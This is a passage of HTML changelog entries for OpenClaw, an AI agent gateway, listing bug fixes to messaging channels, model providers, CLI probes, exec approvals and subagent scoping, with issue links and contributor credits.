<li>Active Memory: skip payload-less <code>memory_search</code> transcript tool results when building debug telemetry, so newer empty entries no longer hide the latest useful debug payload. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289720192" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68773" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68773/hovercard" href="https://github.com/openclaw/openclaw/pull/68773">#68773</a>) Thanks @SimbaKingjoe.</li>
<li>Active Memory: keep recall setup time from consuming the configured model timeout while giving the hook runner an explicit bounded budget for the plugin, so slow embedded-run setup no longer causes immediate recall timeouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333274016" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72606" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72606/hovercard" href="https://github.com/openclaw/openclaw/issues/72606">#72606</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333343055" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72620" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72620/hovercard" href="https://github.com/openclaw/openclaw/pull/72620">#72620</a>) Thanks @hyspacex.</li>
<li>Channels/Discord: bound message read/search REST calls, route those actions through Gateway execution, and fall back to <code>CommandTargetSessionKey</code> for inbound hook session keys so Discord reads do not hang and hooks still fire when <code>SessionKey</code> is empty. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341806261" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73431" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73431/hovercard" href="https://github.com/openclaw/openclaw/issues/73431">#73431</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342707124" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73521" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73521/hovercard" href="https://github.com/openclaw/openclaw/pull/73521">#73521</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Plugins/media: auto-enable provider plugins referenced by <code>agents.defaults.imageGenerationModel</code>, <code>videoGenerationModel</code>, and <code>musicGenerationModel</code> primary/fallback refs, so configured Google and MiniMax media providers do not stay disabled behind a restrictive plugin allowlist. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Memory-core/dreaming: retry managed dreaming cron registration after startup when the cron service is not reachable yet, so the scheduled Memory Dreaming Promotion sweep recovers without waiting for heartbeat traffic. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336307968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72841" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72841/hovercard" href="https://github.com/openclaw/openclaw/issues/72841">#72841</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Acpx/runtime: validate the runtime session mode at the <code>AcpxRuntime.ensureSession</code> wrapper boundary so callers that pass anything other than <code>persistent</code> or <code>oneshot</code> get a clear <code>ACP_INVALID_RUNTIME_OPTION</code> error instead of silently round-tripping through the encoded handle as a default <code>persistent</code> mode and later throwing <code>SessionResumeRequiredError</code>. Investigation context: <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339298543" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73071" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73071/hovercard" href="https://github.com/openclaw/openclaw/issues/73071">#73071</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342946140" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73548" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73548/hovercard" href="https://github.com/openclaw/openclaw/pull/73548">#73548</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>CLI/infer: keep web-search fallback on missing provider API keys, preserve structured validation errors from the selected provider, and let per-request image describe prompts override configured media-entry prompts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226252002" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63263" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63263/hovercard" href="https://github.com/openclaw/openclaw/pull/63263">#63263</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Spolen23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Spolen23">@Spolen23</a>.</li>
<li>Chat commands: include configured model-catalog reasoning metadata when building <code>/think</code> argument menus so Ollama Cloud and other provider-owned reasoning models show supported levels instead of only <code>off</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342653082" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73515" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73515/hovercard" href="https://github.com/openclaw/openclaw/issues/73515">#73515</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343323395" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73568" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73568/hovercard" href="https://github.com/openclaw/openclaw/pull/73568">#73568</a>. Thanks @danielzinhu99 and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>Channels/Telegram: suppress generic tool-progress chatter when preview streaming is off, so non-streaming Telegram turns only deliver final replies while approvals, media, and errors still route normally. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331988059" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72363" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72363/hovercard" href="https://github.com/openclaw/openclaw/issues/72363">#72363</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332559274" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72482" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72482/hovercard" href="https://github.com/openclaw/openclaw/pull/72482">#72482</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a> and @SweetSophia.</li>
<li>CLI/model probes: add repeatable image <code>--file</code> inputs to <code>infer model run</code> for local and gateway multimodal model smokes, so vision models such as Ollama Qwen VL and Gemini can be tested through the raw model-probe surface. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231557359" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63700" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63700/hovercard" href="https://github.com/openclaw/openclaw/issues/63700">#63700</a>. Thanks @cedricjanssens.</li>
<li>CLI/model probes: request trusted operator scope for <code>infer model run --gateway --model &lt;provider/model&gt;</code> so Gateway raw model smokes can use one-off provider/model overrides instead of being rejected before provider auth resolution. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345598480" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73759" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73759/hovercard" href="https://github.com/openclaw/openclaw/issues/73759">#73759</a>. Thanks @chrislro.</li>
<li>CLI/image describe: pass <code>--prompt</code> and <code>--timeout-ms</code> through <code>infer image describe</code> and <code>describe-many</code>, so custom vision instructions and slow local model budgets reach media-understanding providers such as Ollama, OpenAI, Google, and OpenRouter. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231557359" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63700" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63700/hovercard" href="https://github.com/openclaw/openclaw/issues/63700">#63700</a>. Thanks @cedricjanssens.</li>
<li>Model selection: include the rejected provider/model ref and allowlist recovery hint when a stored session override is cleared, so local model selections such as Gemma GGUF variants do not fall back to the default with a generic message. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4322522808" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71069/hovercard" href="https://github.com/openclaw/openclaw/issues/71069">#71069</a>. Thanks @CyberRaccoonTeam.</li>
<li>OpenAI-compatible providers: drop malformed event-only or blank-data SSE frames before the OpenAI SDK stream parser sees them, so proxies that split <code>event:</code> from <code>data:</code> no longer crash streaming runs with <code>Unexpected end of JSON input</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4120148034" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52802" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52802/hovercard" href="https://github.com/openclaw/openclaw/issues/52802">#52802</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LyHug/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LyHug">@LyHug</a>.</li>
<li>Gateway/OpenAI-compatible streaming: strip <code>&lt;final&gt;</code> tags split across streamed model deltas before they reach SSE clients, so <code>/v1/chat/completions</code> no longer emits tag remnants or drops content when final-answer wrappers cross chunk boundaries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226978969" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63325" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63325/hovercard" href="https://github.com/openclaw/openclaw/issues/63325">#63325</a>. Thanks @tzwickl.</li>
<li>Ollama: resolve explicitly selected signed-in <code>:cloud</code> models through <code>/api/show</code> when <code>/api/tags</code> omits them, so working models such as <code>gemini-3-flash-preview:cloud</code> and <code>deepseek-v4-pro:cloud</code> do not fail dynamic model resolution before the native <code>/api/chat</code> transport runs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347240832" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73909" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73909/hovercard" href="https://github.com/openclaw/openclaw/issues/73909">#73909</a>. Thanks @chtse53.</li>
<li>Discord/exec approvals: keep the local <code>/approve</code> prompt when no native Discord approval runtime is active, and send a manual fallback notice when native approval delivery reaches no targets, so failed DM cards no longer leave approval turns silent or dependent on model-written shell commands. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347379791" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73954" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73954/hovercard" href="https://github.com/openclaw/openclaw/issues/73954">#73954</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347582133" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74027" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74027/hovercard" href="https://github.com/openclaw/openclaw/pull/74027">#74027</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/guarismo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/guarismo">@guarismo</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brokemac79/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brokemac79">@brokemac79</a>.</li>
<li>Local model prompt caching: keep stable Project Context above volatile channel/session prompt guidance and stop embedding current channel names in the message tool description, so Ollama, MLX, llama.cpp, and other prefix-cache backends avoid avoidable full prompt reprocessing across channel turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042157634" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40256" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40256/hovercard" href="https://github.com/openclaw/openclaw/issues/40256">#40256</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042278613" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40296" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40296/hovercard" href="https://github.com/openclaw/openclaw/pull/40296">#40296</a>. Thanks @rhclaw and @sriram369.</li>
<li>Gateway/OpenAI-compatible API: guard provider policy lookup against runtime providers with non-array <code>models</code> values, so <code>/v1/chat/completions</code> no longer fails with <code>provider?.models?.some is not a function</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264109417" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66744" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66744/hovercard" href="https://github.com/openclaw/openclaw/issues/66744">#66744</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264303605" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66761" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66761/hovercard" href="https://github.com/openclaw/openclaw/pull/66761">#66761</a>. Thanks @MightyMoud, @MukundaKatta.</li>
<li>WhatsApp/Web: pass explicit Baileys socket timings into every WhatsApp Web socket and expose <code>web.whatsapp.*</code> keepalive, connect, and query timeout settings so unstable networks can avoid repeated 408 disconnect and opening-handshake timeout loops. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4159428566" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56365" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56365/hovercard" href="https://github.com/openclaw/openclaw/issues/56365">#56365</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343447305" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73580" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73580/hovercard" href="https://github.com/openclaw/openclaw/pull/73580">#73580</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/velvet-shark/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/velvet-shark">@velvet-shark</a>.</li>
<li>WhatsApp/Web: recover recently active listeners when a post-408 reconnect keeps receiving transport frames but stops delivering app messages, while keeping group metadata fallback off Baileys sends. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4233698306" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63855" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63855/hovercard" href="https://github.com/openclaw/openclaw/issues/63855">#63855</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265721576" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66920" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66920/hovercard" href="https://github.com/openclaw/openclaw/issues/66920">#66920</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3887700676" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/7433" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/7433/hovercard" href="https://github.com/openclaw/openclaw/issues/7433">#7433</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4280282270" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67986" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67986/hovercard" href="https://github.com/openclaw/openclaw/issues/67986">#67986</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319778979" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70856" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70856/hovercard" href="https://github.com/openclaw/openclaw/issues/70856">#70856</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4197893841" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60007" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60007/hovercard" href="https://github.com/openclaw/openclaw/pull/60007">#60007</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333345205" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72621" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72621/hovercard" href="https://github.com/openclaw/openclaw/pull/72621">#72621</a>. Thanks @legonhilltech-jpg, @octopuslabs-fl, @Kanorin-chan, and @stuswan.</li>
<li>Channels/Telegram: persist native command metadata on target sessions so topic, helper, and ACP-bound slash commands keep their session metadata attached to the routed conversation. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4168079108" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57548" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/57548/hovercard" href="https://github.com/openclaw/openclaw/pull/57548">#57548</a>) Thanks @GaosCode.</li>
<li>Channels/native commands: keep validated native slash command replies visible in group chats while preserving explicit owner allowlists for command authorization. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344709307" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73672" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73672/hovercard" href="https://github.com/openclaw/openclaw/pull/73672">#73672</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Pairing/doctor: bootstrap <code>commands.ownerAllowFrom</code> from the first approved DM pairing when no command owner exists, and have doctor explain missing owners so privileged slash commands are not accidentally unusable after onboarding. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Telegram/exec: infer native exec approvers from <code>commands.ownerAllowFrom</code> and auto-enable the Telegram approval client when an owner is resolvable, so owner-only commands such as <code>/diagnostics</code> can be approved in Telegram without duplicate per-channel approver config. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Auto-reply/session: carry the tail of user/assistant turns into the freshly-rotated transcript on silent in-reply session resets (compaction failure, role-ordering conflict) so direct-chat continuity survives the rebind. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319746928" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70853" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70853/hovercard" href="https://github.com/openclaw/openclaw/issues/70853">#70853</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320196607" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70898" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70898/hovercard" href="https://github.com/openclaw/openclaw/pull/70898">#70898</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>Skills: load grouped skill directories such as <code>skills/&lt;group&gt;/&lt;skill&gt;/SKILL.md</code> from configured skill roots while keeping grouped discovery capped for large directories. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4163525640" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56915" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56915/hovercard" href="https://github.com/openclaw/openclaw/issues/56915">#56915</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332799995" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72534" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72534/hovercard" href="https://github.com/openclaw/openclaw/pull/72534">#72534</a>) Thanks @ottodeng, @MoerAI, and @i010542.</li>
<li>Config: skip malformed non-string <code>env.vars</code> entries before env-reference checks, so config loading no longer crashes on JSON values like numbers or booleans. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4053205994" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42402" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/42402/hovercard" href="https://github.com/openclaw/openclaw/pull/42402">#42402</a>) Thanks @MiltonHeYan.</li>
<li>Docker Compose: default missing config and workspace bind mounts to <code>${HOME:-/tmp}/.openclaw</code> so manual compose runs do not create invalid empty-source volume specs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4241483820" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64485" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64485/hovercard" href="https://github.com/openclaw/openclaw/pull/64485">#64485</a>) Thanks @jlapenna.</li>
<li>Agents/context engines: preserve the child agent's configured <code>agentDir</code> when subagent cleanup re-resolves a context engine, so <code>onSubagentEnded</code> hooks keep operating on the correct per-agent state. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4269702327" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67243" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67243/hovercard" href="https://github.com/openclaw/openclaw/pull/67243">#67243</a>) Thanks @jarimustonen.</li>
<li>Channels/WhatsApp: restrict pairing verification replies to real inbound user content, preventing unsolicited prompts from receipts, typing indicators, presence updates, and other non-message Baileys upserts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346092528" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73797" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73797/hovercard" href="https://github.com/openclaw/openclaw/issues/73797">#73797</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346437717" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73823" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73823/hovercard" href="https://github.com/openclaw/openclaw/pull/73823">#73823</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Configure/Ollama: show the configured Ollama model allowlist after Cloud only or Cloud + Local setup and skip slow per-model cloud metadata fetches. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347480168" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73995" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73995/hovercard" href="https://github.com/openclaw/openclaw/pull/73995">#73995</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Channels/WhatsApp: detect explicit group <code>@mentions</code> again when the bot's own E.164 is in <code>allowFrom</code>, so shared-number setups no longer skip group pings that directly mention the bot. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4091909998" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49317" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49317/hovercard" href="https://github.com/openclaw/openclaw/issues/49317">#49317</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342031370" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73453" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73453/hovercard" href="https://github.com/openclaw/openclaw/pull/73453">#73453</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juan-flores077/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juan-flores077">@juan-flores077</a>.</li>
<li>WhatsApp/reliability: publish real transport-liveness into WhatsApp channel status and force earlier reconnects on silent transport stalls, so quiet healthy sessions stay connected while wedged sockets recover before the later remote 408 path. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333644872" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72656" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72656/hovercard" href="https://github.com/openclaw/openclaw/pull/72656">#72656</a>) Thanks @Sathvik-1007.</li>
<li>Core/channels: tighten selected runtime, media, and plugin edge-case handling while preserving existing behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>.</li>
<li>Channels/WhatsApp: strip leaked plural tool-call XML wrappers on every WhatsApp-visible outbound path and keep channel error payloads out of WhatsApp chats. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329523309" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71830" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71830/hovercard" href="https://github.com/openclaw/openclaw/pull/71830">#71830</a>) Thanks @rubencu.</li>
<li>Agents/embedded-runner: inject the resolved OAuth bearer (and forward the run abort signal) on the boundary-aware embedded stream fallback so models that route through <code>openai-codex-responses</code> and other boundary-aware transports stop failing with <code>401 Unauthorized: Missing bearer or basic authentication in header</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343169386" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73559" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73559/hovercard" href="https://github.com/openclaw/openclaw/issues/73559">#73559</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343600007" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73588" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73588/hovercard" href="https://github.com/openclaw/openclaw/pull/73588">#73588</a>) Thanks @openperf.</li>
<li>Telegram/gateway: bound outbound Bot API calls and cache bundled plugin alias lookup so slow Telegram sends or WSL2 filesystem scans no longer wedge gateway replies. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348974196" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74210" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74210/hovercard" href="https://github.com/openclaw/openclaw/pull/74210">#74210</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Configure/GitHub Copilot: reuse existing Copilot auth during configure and show the provider's manifest model catalog in the model picker. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349704967" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74276" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74276/hovercard" href="https://github.com/openclaw/openclaw/pull/74276">#74276</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Configure/models: keep the model picker scoped to the selected manifest provider and enable its bundled plugin before catalog lookup, so choosing GitHub Copilot no longer falls back to Ollama or skips the catalog. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350379800" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74322" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74322/hovercard" href="https://github.com/openclaw/openclaw/pull/74322">#74322</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Auto-reply/subagents: reject <code>/focus</code> from leaf subagents and scope fallback target resolution to the requesting subagent's children, so subagents cannot bind conversations outside their control boundary. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344094857" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73613" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73613/hovercard" href="https://github.com/openclaw/openclaw/pull/73613">#73613</a>) Thanks @drobison00.</li>
